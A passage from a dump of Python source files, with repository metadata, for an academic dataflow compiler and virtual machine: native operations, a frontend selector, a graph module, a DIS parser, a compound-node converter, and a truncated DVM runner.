#\n\n##\n# See if a string contains a value.\n#\n# \\param str, x strings\n# \\return True if x is an element of str\n##\ndef dvm_str_contains(str, x): return x in str\n\n##\n# Return the idx of x in str.\n#\n# \\param str, x strings\n# \\return \n#\tthe idx of x in str.\n#\t-1 if x is not in str.\n##\ndef dvm_str_find(str, x): return str.find(x)\n\n##\n# Conver a string to upper case.\n#\n# \\param str a string\n# \\return the string in upper case.\n##\ndef dvm_str_upper(str): return str.upper()\n\n##\n# Conver a string to lower case.\n#\n# \\param str a string\n# \\return the string in lower case.\n##\ndef dvm_str_lower(str): return str.lower()\n\n##\n# Get a substring.\n#\n# \\param str a string\n# \\param start the index to start at.\n# \\param stop the index to stop at.\n##\ndef dvm_str_sub(str, start, stop): return str[start:stop]\n\n##\n# Reverse a string.\n#\n# \\param str a string\n# \\return the reversed string\n##\ndef dvm_str_reverse(str): return str[::-1]\n\n##\n# Append 2 strings.\n# \n# \\param l, r strings\n# \\return the combination of 2 strings.\n##\ndef dvm_str_append(l, r): return l + r\n\n# ---------------- #\n# Array Operations #\n# ---------------- #\n\n##\n# See if an array is empty.\n#\n# \\param arr the array\n# \\return True if the array is empty\n##\ndef dvm_arr_isEmpty(arr): return arr == []\n\n##\n# Get the length of an array.\n#\n# \\param arr An array\n# \\return the length of the array.\n##\ndef dvm_arr_length(arr): return len(arr)\n\n##\n# Get the upper bound of an array.\n#\n# \\param arr An array\n# \\return highest index of the array.\n##\ndef dvm_arr_bound(arr): return len(arr) - 1\n\n##\n# Create an empty array\n##\ndef dvm_arr_empty(): return []\n\n##\n# Create an array filled with an element\n#\n# \\param length the length of the array\n# \\param fill the element to fill the array with\n# \\return the new array\n##\ndef dvm_arr_create(length, fill): return [fill] * length\n\n##\n# Get an element from the array.\n#\n# \\param arr the array to taken an element from\n# \\param idx the indes to access\n# \\return the element arr[idx]\n##\ndef dvm_arr_get(arr, idx): return arr[idx]\n\n##\n# Create a new array with a different\n# element at idx.\n#\n# \\param arr the array\n# \\param idx the index to modify\n# \\param el the element to insert\n# \\return \n#\ta new array that is identical to\n#\tarr, with the element at idx replaced by el\n##\ndef dvm_arr_set(arr, idx, el):\n\tres = copy.deepcopy(arr)\n\tres[idx] = el\n\treturn res\n\n##\n# Insert elements into an array.\n#\n# e.g: \n# \n# test = [1,2,3]\n# >>> natives.dvm_arr_insert(test, 1, 'a', 'b')\n# [1, 'a', 'b', 2, 3]\n#\n# \\param arr the array\n# \\param idx the start index\n# \\param el the elements to include.\n# \\return \n#\tA new array, which consists of arr\n#\twith the elements added at index.\n#\tThe elements are inserted at index, but \n#\tdo not replace anything after index.\n##\ndef dvm_arr_insert(arr, idx, *el): \n\tres = copy.deepcopy(arr)\n\tpre = res[:idx]\n\tpos = res[idx:]\n\treturn pre + list(el) + pos\n\n##\n# Replace elements in an array. \n# Similar to dvm_arr_insert, but\n# replaces the elements starting at idx.\n#\n# e.g: \n# \n# test = [1,2,3]\n# >>> natives.dvm_arr_replace(test, 1, 'a', 'b')\n# [1, 'a', 'b']\n#\n# \\param arr the array\n# \\param idx the start index\n# \\param el the elements to include.\n# \\return \n#\t\tA new array, with the elements\n#\t\tstarting at idx replaced by el.\n##\ndef dvm_arr_replace(arr, idx, *el):\n\tres = copy.deepcopy(arr)\n\tres[idx:len(el) + 1] = el\n\treturn res\n\n##\n# Array concatenation.\n#\n# \\param l,r arrays.\n# \\param rest (optional) other arrays to concatenate.\n# \\return concatenation of l and r.\n##\ndef dvm_arr_catenate(l, r, *rest):\n\tif rest:\n\t\tres = l + r\n\t\tfor lst in rest: res += lst\n\t\treturn res\n\telse: \n\t\treturn l + r\n\n##\n# Add an element to the start of an array.\n#\n# \\param arr An array\n# \\param el The element to add.\n# \\return \n#\t\ta copy of arr with el \n#\t\tadded in front.\n##\ndef dvm_arr_add_front(arr, el):\n\treturn [el] + arr\n\n##\n# Add an element to the back of an array.\n#\n# \\param arr An array\n# \\param el The element to add.\n# \\return \n#\t\ta copy of arr with el \n#\t\tadded to the back.\n##\ndef dvm_arr_add_back(arr, el):\n\treturn arr + [el]\n\n##\n# Get a subset of an array\n#\n# \\param arr An array\n# \\param start The idx to start at.\n# \\param stop The idx to stop at.\n# \\return \n#\t\tAn array containing the elements of \n#\t\tarr between start and stop.\n##\ndef dvm_arr_sub(arr, start, stop):\n\treturn arr[start:stop]\n\n##\n# Create an array with the value of the\n# first array if the value of the second\n# array is true.\n#\n# \\param arr\n#\t\tThe array to gather elements from.\n# \\param bools\n#\t\tAn array of booleans.\n# \\return\n#\t\tAn array with all the elements of arr for \n#\t\twhich the corresponding element in bools is true.\n##\ndef dvm_arr_prune(arr, bools):\n\treturn [el[0] for el in zip(arr, bools) if el[1]]\n\n# ---------------- #\n# Tuple Operations #\n# ---------------- #\n\n## \n# Access an element of a tuple.\n#\n# \\param tup A tuple\n# \\param idx An integer\n# \\return The element found at idx in the tuple.\n##\ndef dvm_tup_get(tup, idx):\n\treturn tup[idx]\n\n# ----- #\n# Other #\n# ----- #\n\n##\n# Generate a range.\n# \\param start, stop The lower and upper bounds of the range\n# \\return An array containing [start..stop]\n##\ndef dvm_range(start, stop): return range(start, stop + 1)\n\n## \n# Contains references to all\n# the operations.\n##\noperations = { \n\t'void' : dvm_Void,\n\t'bool' : dvm_Bool,\n\t'int' : dvm_Int,\n\t'float' : dvm_Float,\n\t'string' : dvm_String,\n\t'array' : dvm_Array,\n\t'tuple' : dvm_tuple,\n\n\t'noOp' : dvm_noOp,\n\t'isVoid' : dvm_isVoid,\n\t'equals' : dvm_equals,\n\t'notEq' : dvm_notEqual,\n\n\t'and' : dvm_and,\n\t'or' : dvm_or,\n\t'xor' : dvm_xor,\n\t'not' : dvm_not,\n\n\t'neg' : dvm_neg,\n\t'abs' : dvm_abs,\n\t'add' : dvm_add,\n\t'sub' : dvm_sub,\n\t'mul' : dvm_mul,\n\t'div' : dvm_div,\n\t'mod' : dvm_mod,\n\t'exp' : dvm_exp,\n\t'floor' : dvm_floor,\n\t'ceil' : dvm_ceil,\n\t'min' : dvm_min,\n\t'max' : dvm_max,\n\t'less' : dvm_less,\n\t'more' : dvm_more,\n\t'lessEq' : dvm_less_eq,\n\t'moreEq' : dvm_more_eq,\n\n\t'strContains' : dvm_str_contains,\n\t'strFind' : dvm_str_find,\n\t'strUpper' : dvm_str_upper,\n\t'strLower' : dvm_str_lower,\n\t'strSub' : dvm_str_sub,\n\t'strRev' : dvm_str_reverse,\n\t'strApp' : dvm_str_append,\n\n\t'arrIsEmpty' : dvm_arr_isEmpty,\n\t'arrLen' : dvm_arr_length,\n\t'arrBound' : dvm_arr_bound,\n\t'arrEmpty' : dvm_arr_empty,\n\t'arrCreate' : dvm_arr_create,\n\t'arrGet' : dvm_arr_get,\n\t'arrSet' : dvm_arr_set,\n\t'arrIns' : dvm_arr_insert,\n\t'arrRepl' : dvm_arr_replace,\n\t'arrCat' : dvm_arr_catenate,\n\t'arrAddFrnt' : dvm_arr_add_front,\n\t'arrAddBck' : dvm_arr_add_back,\n\t'arrSub' : dvm_arr_sub,\n\t'arrPrune' : dvm_arr_prune,\n\n\t'tupGet' : dvm_tup_get,\n\t'range' : dvm_range\n}\n" }, { "alpha_fraction": 0.7157546877861023, "alphanum_fraction": 0.7194271087646484, "avg_line_length": 23.990825653076172, "blob_id": "37365de106ffff2886d717c1e9cf5d826224908d", "content_id": "db618fb7e405e3d71724d2e7f1237029b6c24080", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2723, "license_type": "no_license", "max_line_length": 80, "num_lines": 109, "path": "/DISc/frontEnd/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd\n# \\brief DISc Frontend Selector\n# \n# This module serves as an interface to any frontend that the user may choose.\n# Any frontEnd module should define a fromString function that is reachable from\n# it's package. (defined in the __init__ file of this package).\n##\n\nimport importlib\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## \n# Store the currently selected\n# front end.\n##\nfrontEnd = None\n\n##\n# Store the file extensions \n# and the front ends they map to.\n##\nfrontEnds = {\n\t'.sis' : 'Sisal',\n\t'.if1' : 'IF1'\n}\n\n##\n# Set up the front end from the\n# command line arguments.\n#\n# \\param extension\n#\t\tThe extension of the input file.\n# \\param flagVal\n#\t\tThe value of the front end flag.\n##\ndef setUp(extension, flagVal):\n\tif flagVal:\n\t\tset(flagVal)\n\telse:\n\t\tset(frontEnds[extension])\n\n##\n# Select a frontend to use.\n#\n# \\param name \n#\t\tA name that matches a package in the\n#\t\tfrontEnd package.\n##\ndef set(name):\n\tglobal frontEnd\n\ttry:\n\t\tfrontEnd = importlib.import_module('.%s' % name, __name__)\n\texcept ImportError:\n\t\tlog.error(\"Frontend '%s' not found.\", name)\n\n##\n# Convert the given string to IGR.\n# This simply calls the same method on\n# the selected frontend.\n#\n# \\param str\n#\t\tThe string to convert to IGR.\n##\ndef fromString(str):\n\tif frontEnd:\n\t\tfrontEnd.fromString(str)\n\telse:\n\t\tlog.error(\"No frontEnd specified...\")\n\n##\n# Convert the contents of a file to\n# IGR. This simply calls fromString()\n# on the contents of the file.\n#\n# \\param path\n#\t\tThe path of the file.\n##\ndef fromFile(path):\n\tfile = open(path, 'r')\n\tfromString(file.read())" }, { "alpha_fraction": 0.725257933139801, "alphanum_fraction": 0.7283148765563965, "avg_line_length": 26.27083396911621, "blob_id": "31ee3329d3404df8f42a0e3dccb503d925caf1f4", "content_id": "7d65aef5c4a2783189abc40f78984a1dd76be2dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2617, "license_type": "no_license", "max_line_length": 79, "num_lines": 96, "path": "/DISc/IGR/graph.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# graph.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.graph\n# \\brief Complete program\n# \n# This defines the complete program graph. All of the subgraphs\n# as well as their names can be found here.\n#\n# This file also defines a few top level functions that \n# facilitate adding nodes, ports and literals to the IGR.\n##\n\n## All of the functions in the program \n__SUBGRAPHS__ = []\n\n## The function names, combined with the subgraph they map to.\n__FUNCTION_NAMES__ = {}\n\n##\n# Add a subgraph to the program.\n#\n# \\param subGraph\n#\t\tThe subgraph to add.\n## \ndef addSubGraph(subGraph):\n\t__SUBGRAPHS__.append(subGraph)\n\n##\n# Add a subgraph to a given name.\n#\n# \\param graph\n#\t\tThe graph to add. It's name \n#\t\tfield will be used to retrieve it.\n##\ndef bindName(graph):\n\t__FUNCTION_NAMES__.update({graph.name : graph})\n\n##\n# Get a list of all the non-compound subgraphs\n# in the program.\n#\n# \\return \n#\t \tAll the non compound subgraphs in the program.\n## \ndef getSubGraphs():\n\treturn __SUBGRAPHS__\n\n##\n# Get a subgraph by name.\n#\n# \\param name\n#\t\tThe name of the subgraph \n# \t\twe want to retrieve.\n# \\return\n#\t\tThe subgraph\n##\ndef getSubGraph(name):\n\treturn __FUNCTION_NAMES__[name]\n\n##\n# Remove a subgraph from the program.\n# This only works for subgraphs that are\n# not a part of a compound node.\n# Care should be taken to avoid calling this method\n# while iterating over the subgraph list.\n#\n# \\param subGraph\n#\t\tA reference to the subgraph to remove.\n##\ndef removeSubGraph(subGraph):\n\t__SUBGRAPHS__.remove(subGraph)" }, { "alpha_fraction": 0.6785436272621155, "alphanum_fraction": 0.684922993183136, "avg_line_length": 22.628677368164062, "blob_id": "0f5ca2aa7c831fec2c47b7baf06d3aef1f1c8152", "content_id": "8ac02c4a080ecad5cadcb0fad3feb02f6b5935ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6427, "license_type": "no_license", "max_line_length": 87, "num_lines": 272, "path": "/DVM/read.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# read.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package read\n# \\brief DIS parser\n#\n# This module defines the function necessary to\n# read DIS files.\n##\n\nimport sys\nimport core\nimport user\nimport natives\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.WARNING)\n\nchunk = None\n\n# ----------- #\n# Convenience #\n# ----------- #\n\n## Parse a value string.\ndef parseValue(str):\n\ttry:\n\t\treturn eval(str)\n\texcept SyntaxError, e:\n\t\tlog.error(\"Invalid literal syntax: %s\", e.text)\n\t\tsys.exit(user.EXIT_INPUT)\n\n##\n# Extract the value of a statement.\n#\n# The value of a statement is found after the statement,\n# and seperated from the statement by a `<=` and a space.\n##\ndef extractValue(stmt):\n\tvalStart = stmt.find('<= ')\n\n\tif valStart == -1:\n\t\tlog.error(\"Missing value in statement: %s\", stmt)\n\t\treturn\n\n\tval = stmt[valStart + 3:]\n\treturn parseValue(val)\n\n## \n# Get a list of instruction addresses\n# from the array, starting at idx start.\n##\ndef getInstructionList(arr, start):\n\ttry:\n\t\treturn [(int(arr[i]), int(arr[i+1])) for i in xrange(start, len(arr), 2)]\n\texcept IndexError:\n\t\tlog.error(\"Invalid destination list encountered: %s\", arr)\n\t\treturn []\n\n# ------------ #\n# Instructions #\n# ------------ #\n\n## Create a sink.\ndef createSink(arr, stmt):\n\treturn core.addSink()\n\n## Create a constant.\ndef createConstant(arr, stmt):\n\treturn core.addConstant(extractValue(stmt))\n\n## Create a stop instruction\ndef createStop(arr, stmt):\n\treturn core.addStopInstruction()\n##\n# Create a start instruction.\n#\n# Creates a sink and adds the amount\n# of incoming elements to the runtime.\n##\ndef createStart(arr, stmt):\n\tcore.setIn(int(arr[3]))\n\treturn createSink(arr, stmt)\n\n## Create a context change instruction.\ndef createContextChange(arr, stmt):\n\tchanges = int(arr[3])\n\treturns = int(arr[4])\n\tdstChnk = int(arr[5])\n\tdstInst = int(arr[6])\n\tretChnk = int(arr[7])\n\tretInst = int(arr[8])\n\treturn core.addContextChange(changes, returns, (dstChnk, dstInst), (retChnk, retInst))\n\n## Create a context map function\ndef createSplit(arr, stmt):\n\tbinds = int(arr[3])\n\tdestChnk = int(arr[4])\n\tdestInst = int(arr[5])\n\tmergeChnk = int(arr[6])\n\tmergeInst = int(arr[7])\n\treturn core.addSplit(binds, (destChnk, destInst), (mergeChnk, mergeInst))\n\n## Create a context restore\ndef createContextRestore(arr, stmt):\n\treturn core.addContextRestore()\n\n## Create an operation\ndef createOperation(arr, stmt):\n\topCode = arr[3]\n\tinputs = int(arr[4])\n\n\ttry:\n\t\top = natives.operations[opCode]\n\t\treturn core.addOperationInstruction(op, inputs)\n\texcept KeyError:\n\t\tlog.error(\"Invalid operation key: %s, using noOp instead.\", opCode)\n\t\treturn core.addOperationInstruction(natives.dvm_noOp, inputs)\n\n## Create a switch instruction.\ndef createSwitch(arr, stmt):\n\treturn core.addSwitch(getInstructionList(arr, 3))\n\n## \n# Defines the operation codes \n# and the functions to create them.\n##\ninstructions = {\n\t'SWI' : createSwitch,\n\t'SNK' : createSink,\n\t'BGN' : createStart,\n\t'STP' : createStop,\n\t'SPL' : createSplit,\n\t'CHN' : createContextChange,\n\t'RST' : createContextRestore,\n\t'OPR' : createOperation,\n\t'CNS' : createConstant\n}\n\n# ---------- #\n# Statements #\n# ---------- #\n\n##\n# Parse an instruction declaration.\n# Verify that it ended up in the correct chunk.\n##\ndef parseInst(arr, stmt):\n\tcode = arr[1]\n\tkey = instructions[code](arr, stmt)\n\tif key != (chunk, int(arr[2])):\n\t\tlog.error(\"Instruction %s added to memory with incorrect key %s\", arr, key)\n\telse: log.info(\"Added instruction with key %s\", key)\n\n##\n# Parse a chunk declaration.\n#\n# A chunk declaration has the form:\n# `CHUNK <idx>`\n##\ndef parseChunk(arr, stmt):\n\tglobal chunk\n\tchunk = int(arr[1])\n\n\tlog.info(\"Starting chunk: %d\", chunk)\n\n##\n# Parse a literal declarations.\n#\n# A literal declaration has the form:\n# `LITR <instruction> <port> <= <value>`\n##\ndef parseLit(arr, stmt):\n\tinst = int(arr[1])\n\tport = int(arr[2])\n\n\tlit = extractValue(stmt)\n\n\tlog.info(\"Adding Literal: '%s' to c %d i %d p %d\", \n\t\tlit, chunk, inst, port)\n\n\tcore.addLiteral((chunk, inst), port, lit)\n\n##\n# Parse a link statement.\n#\n# A link statement has the form:\n# `LINK <from> -> <to>` where from and\n# to have the form:\n# `<chunk> <instruction> <port>`\n##\ndef parseLink(arr, stmt):\n\tsrcChnk = int(arr[1])\n\tsrcInst = int(arr[2])\n\tsrcPort = int(arr[3])\n\n\tdstChnk = int(arr[5])\n\tdstInst = int(arr[6])\n\tdstPort = int(arr[7])\n\n\tlog.info(\"Adding link from: c %d i %d p %d to: c %d i %d p %d\", \n\t\tsrcChnk, srcInst, srcPort, dstChnk, dstInst, dstPort)\n\n\tcore.addDestination(\n\t\t(srcChnk, srcInst), srcPort, \n\t\t(dstChnk, dstInst), dstPort)\n\n##\n# Parse a trivial statement.\n#\n# A trivial statement has the form:\n# `TRIV <= <value>`\n##\ndef parseTriv(arr, stmt):\n\tval = extractValue(stmt)\n\tcore.addTrivial(val)\n\n# ------- #\n# General #\n# ------- #\n\n## Functions to parse the various statements.\nfunctions = {\n\t'CHUNK' : parseChunk,\n\t'INST' : parseInst,\n\t'LINK' : parseLink,\n\t'LITR' : parseLit,\n\t'TRIV' : parseTriv\n}\n\n## Parse a single DIS line.\ndef parseLine(line):\n\tstmt = line.split('$')[0]\n\tstmt = stmt.strip()\n\tif len(stmt) is not 0:\n\t\tlog.debug(\"Reading statement: '%s'\", stmt)\n\t\tarr = stmt.split()\n\t\tkey = arr[0]\n\t\tfunctions[key](arr, stmt)\n\n## \n# Parse a dis string\n##\ndef parse(str):\n\tfor line in str.split('\\n'):\n\t\tparseLine(line)\n\tlog.info(\"Finished parsing, instruction memory: %s\", core.memory.memory())\n" }, { "alpha_fraction": 0.698248565196991, "alphanum_fraction": 0.7064781785011292, "avg_line_length": 27.214284896850586, "blob_id": "bb0ea822373102123f30dc6c4e8971bf980a7c9d", "content_id": "63f0eb012ee36aab0bd888367f6417ba0eaf6421", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4739, "license_type": "no_license", "max_line_length": 79, "num_lines": 168, "path": "/DISc/backEnd/DVM/compoundConverter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# compoundConverter.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.compoundConverter\n# \\brief IGR compound node compiler\n#\n# This module contains functions for the compilation of compound nodes.\n# It's worth noting that the links to and from a compound node are made by\n# the regular nodeConverter.\n##\n\nimport graphConverter\n\n# ----------- #\n# Select Node #\n# ----------- #\n\n##\n# Ensure all the subgraphs\n# link to the exit sink.\n##\ndef selectStart(dis, comp):\n\tdis.indent += 1\n\n\tretKey = dis.getFromKey(comp)\n\tfor sg in comp.subGraphs[1:]:\n\t\t# Everything that links to exit node of sg will\n\t\t# now link to the common exit sink instead.\n\t\tdis.linkNode(sg.exit, retKey, retKey)\n\t\tif sg.exit in sg.nodes:\n\t\t\t# Make sure we don't parse exit node,\n\t\t\t# but keep it as attribute.\n\t\t\tsg.nodes.remove(sg.exit)\n\n##\n# Add all the subgraph entry points\n# to the destination list of select.\n# Restore exit nodes.\n##\ndef selectStop(dis, comp, idx):\n\tdis.indent -= 1\n\n\tdstLst = []\n\tfor sg in comp.subGraphs[1:]:\n\t\tpair = dis.getToKey(sg.entry)\n\t\tdstLst.append(str(pair[0]))\n\t\tdstLst.append(str(pair[1]))\n\t\tsg.nodes.insert(0, sg.exit)\n\tdis.modifyString(0, idx, lambda str : str + ' '.join(dstLst))\n\n##\n# Convert a select node.\n#\n# First, we add the node itself to dis.\n# We add a sink and a switch. The switch is the\n# actual select while the sink will be the exit point\n# of any results coming out of the compound node.\n#\n# We register the switch as the destination for any incoming links\n# while the sink is registered as the source of outgoing links.\n#\n# Next, we simply ensure all the subgraphs link to the shard sink,\n# and compile the subgraphs.\n#\n# Finally, we get the dis addresses of the possible destinations, after\n# which we add them to the destination list of the switch node.\n##\ndef convertSelectNode(dis, node):\n\tswitch = dis.addInstruction(0, 'SWI', [])\n\tsink = dis.addInstruction(0, 'SNK', [])\n\tdis.linkNode(node, switch, sink)\n\n\tidx = dis.getIdx(0) - 1\n\tselectStart(dis, node)\n\tgraphConverter.convertSubGraphs(node.subGraphs[1:], dis)\n\tselectStop(dis, node, idx)\n\n# ---------- #\n# Forin Node #\n# ---------- #\n\ndef convertForAllNode(dis, node):\n\tdis.addNewlines()\n\tdis.addCommentLines(\"Starting for...in\")\n\tbgn = dis.addInstruction(0, 'SNK', [])\n\tend = dis.addInstruction(0, 'SNK', [])\n\tdis.linkNode(node, bgn, end)\n\n\tdis.indent += 1\n\n\tinputs = node.inputs + 1\n\n\tsplits = [dis.addInstruction(1, 'SPL', [inputs]) for e in node.map]\n\tstopIdx = dis.getIdx(1)\n\tstartIdx = stopIdx - len(node.map) + 1\n\n\tfor key in splits:\n\t\tfor i in xrange(0, inputs):\n\t\t\tdis.addLink(bgn, i, key, i)\n\n\tgen = node.subGraphs[0]\n\tdis.linkNode(gen.exit, bgn, bgn)\n\tgen.removeNode(gen.exit)\n\tgraphConverter.convertSubGraphs(node.subGraphs[0:1], dis)\n\n\tgraphConverter.convertSubGraphs(node.subGraphs[3:], dis)\n\n\tret = node.subGraphs[2]\n\tdis.linkNode(ret.exit, end, end)\n\tret.removeNode(ret.exit)\n\tgraphConverter.convertSubGraphs(node.subGraphs[2:3], dis)\n\n\tfor key, idx in zip(node.map,xrange(startIdx, stopIdx + 1)):\n\t\tsink, merge = node.map[key]\n\t\tdstChunk, dstInst = dis.getToKey(sink)\n\t\tmergeChunk, mergeInst = dis.getToKey(merge)\n\n\t\tdis.modifyString(1, idx, \n\t\t\tlambda str : str + \" %s %s %s %s\" % \n\t\t\t(dstChunk, dstInst, mergeChunk, mergeInst))\n\n\tdis.indent -= 1\n\n# ------- #\n# General #\n# ------- #\n\nconverters = {\n\t'select' : convertSelectNode,\n\t'forall' : convertForAllNode\n}\n\n##\n# Add the DIS equivalent of a certain node\n# to a DIS object.\n#\n# \\param dis\n#\t\tA DIS instance that will contain the DIS version\n#\t\tof the node.\n# \\param node\n#\t\tThe node to convert.\n##\ndef convertNode(dis, node):\n\treturn converters[node.type](dis, node)" }, { "alpha_fraction": 0.7217537760734558, "alphanum_fraction": 0.7268128395080566, "avg_line_length": 28.649999618530273, "blob_id": "e05431d4e6ed6d916778114cdb16b1ffc694e327", "content_id": "353073a95a516f5bacd45a63827a9ad41235031e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2372, "license_type": "no_license", "max_line_length": 85, "num_lines": 80, "path": "/DISc/backEnd/DVM/dvm.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dvm.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.dvm\n# \\brief dvm interface\n#\n# This module provides a few convenient shorthands\n# for calling DVM.\n##\n\nimport subprocess\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## Default dvm path.\npath = 'dvm'\n\n## Default amount of cores to use.\ncores = 8\n\n## Default loglevel to use.\nlogLevel = 50\n\n##\n# Run DVM on a dis string, with inputs,\n# and return the results.\n#\n# \\param dvmPath\n#\t\tThe path to dvm, if dvm is not in your system PATH\n# \\param inputs\n#\t\tThe list of inputs to pass to dvm\n# \\param dis\n#\t\tA string containing the dis representation of the code to execute.\n# \\param cores\n#\t\tThe amount of cores to use when running dvm.\n# \\param logLevel\n#\t\tThe loglevel to pass to DVM (useful for debugging)\n#\n# \\return\n#\t\tThe output returned by dvm, as a python object.\n##\ndef run(dvmPath = path, inputs = [], dis = None, cores = cores, logLevel = logLevel):\n\targs = [dvmPath, \"-\", \"-c\", str(cores), \"-ll\", str(logLevel)]\n\n\tfor e in inputs:\n\t\targs.append(\"-i\")\n\t\targs.append(str(e))\n\n\tdvm = subprocess.Popen(args, 